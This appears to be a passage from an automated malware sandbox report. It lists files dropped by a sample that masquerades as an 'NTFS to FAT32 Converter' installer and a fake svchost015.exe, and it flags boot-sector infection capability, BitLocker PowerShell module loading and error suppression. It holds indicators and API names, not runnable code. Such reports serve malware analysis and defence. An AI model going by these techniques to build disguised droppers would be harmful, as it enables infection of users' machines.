                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D8E8B2
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-F178L.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-UIRHH.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcr100.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeFile created: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeFile created: C:\ProgramData\NTFS2FAT32Converter\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQTWO[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcp100.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-SC9V4.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\is-LIN1F.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-P2BRL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeFile created: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-RFHNE.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5Concurrent.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Roaming\user32_8.drv (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeFile created: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-C2IDQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeFile created: C:\Users\user\AppData\Local\Temp\svchost015.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5PrintSupport.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\is-AJ5Q5.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\UNIQTHREE[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuuc51.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-VR79B.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQ[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-95P8U.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libEGL.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeFile created: C:\ProgramData\NTFS2FAT32Converter\NTFS2FAT32Converter.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_RegDLL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-3S4JD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuin51.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libGLESv2.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpFile created: C:\Users\user\AppData\Roaming\is-4R09J.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeFile created: C:\ProgramData\NTFS2FAT32Converter\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeFile created: C:\ProgramData\NTFS2FAT32Converter\NTFS2FAT32Converter.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQ[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQTWO[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\UNIQTHREE[1].fileJump to dropped file

                    Boot Survival

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D8E8B2
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_00401933 StartServiceCtrlDispatcherA,5_2_00401933

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00423C1C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00423C1C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004241EC IsIconic,SetActiveWindow,SetFocus,4_2_004241EC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004241A4 IsIconic,SetActiveWindow,4_2_004241A4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,4_2_00418394
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,4_2_0042286C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,4_2_004833BC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004175A8 IsIconic,GetCapture,4_2_004175A8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00417CDE IsIconic,SetWindowPos,4_2_00417CDE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,4_2_00417CE0
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,4_2_0041F128
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
